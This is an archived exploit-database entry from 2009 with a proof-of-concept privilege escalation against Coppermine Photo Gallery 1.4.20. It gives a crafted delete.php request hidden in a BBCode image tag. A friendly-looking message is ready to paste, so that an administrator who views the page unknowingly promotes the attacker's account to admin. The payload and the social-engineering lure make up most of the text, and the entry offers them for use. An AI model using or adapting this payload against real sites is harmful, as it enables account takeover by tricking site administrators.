Coppermine Photo Gallery 1.4.20 - BBCode IMG Privilege Escalation

EDB-ID:

8114

CVE:


Author:

StAkeR

Type:

webapps

Platform:

PHP

Published:

2009-02-26

+--------------------------------------------------------------------------+
| Coppermine Photo Gallery <= 1.4.20 (BBCode IMG) Privilege Escalation PoC |
+--------------------------------------------------------------------------+
| by Juri Gianni aka yeat - staker[at]hotmail[dot]it                       |
| http://coppermine-gallery.net                                            |
| Don't add me on msn messenger.                                           |
| This vulnerability can be named as "bbcode img tag script injection"     |
+--------------------------------------------------------------------------+
| Proof of Concept  (an example,to understand it)                          |
+--------------------------------------------------------------------------+
 URL: http://[host]/[path]/delete.php?id=u[ID]&u[ID]=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no
 [img]URL[/img]                                                           
+--------------------------------------------------------------------------+
| Modify [ID] with your user id.                                           |
| Go http://[host]/[path]/displayimage.php?album=random&pos=[album id]     |
+--------------------------------------------------------------------------+
 Insert the below code into a new message
 
 hey admin,nice web site :)
 [img]http://[host]/[path]/delete.php?id=u3&u3=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no[/img]
 
+-------------------------------------------------------------------------+
| The fake image doesn't show errors,you'll see "hey admin,nice web site" |
| You'll become admin when the real admin will visit the page             |          
+-------------------------------------------------------------------------+

# milw0rm.com [2009-02-26]